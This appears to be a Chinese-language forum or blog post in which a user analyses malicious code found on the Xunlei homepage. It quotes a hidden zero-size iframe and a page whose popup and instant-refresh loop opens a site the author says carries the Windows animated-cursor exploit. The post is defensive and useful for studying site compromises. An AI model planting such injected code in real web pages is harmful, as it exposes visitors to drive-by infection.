今天打开迅雷主页,瞬间被无数弹窗所淹没,而且nod32频频报警,还是动态光标漏洞病毒!打开Maxthon,将弹窗地址加入过滤以后,仔细分析了主页代码,发现有这样两行
<iframe id="session_ifr" width="0" height="0" ></iframe>
<script type="text/javascript">
document.getElementById("session_ifr").src = "http://pgv.xunlei.com/?u=http://www.xunlei.com/";
也就是嵌入了一个iframe,地址是 http://pgv.xunlei.com/?u=http://www.xunlei.com/ 。然后再打开这个地址,弹窗过滤器过滤的窗口数字迅速增加,一会儿就100多个了,然后查看这个页面的源代码,发现里面内容是
<html><meta http-equiv='Pragma' content='no-cache'><meta http-equiv='Refresh' content='0;URL='><script LangUage='JavaScript'>{child=window.open('http://just.game2b.cn/adl.htm','','width=800,height=600,toolbar=yes,menubar=yes,location=yes,resizable=yes,status=yes');child.blur();}</script><head><title></title></head><body></body></html>
也就是弹出 'http://just.game2b.cn/adl.htm' 这个地址的窗口,并且0秒钟刷新一次自己,刷新一次,即会弹出一个新的窗口。而这个弹窗的网页是有windows动态光标漏洞病毒的。
查了一下,IP,pgv.xunlei.com 的IP和迅雷主服务器不在一个地方,是 IP : 58.61.39.219 地址: 广东省深圳市 电信,而迅雷主服务器是 IP: 60.28.178.204 地址: 天津市 网通。没有主域名的管理权限的话,一般是无法设置二级域名的。所以这个恶意网页不知道到底是迅雷何方人物放上去的??我相信迅雷官方是不会做出这样的事情来的,但一定要查清楚是谁这样做了,以免给迅雷带来不好的影响! |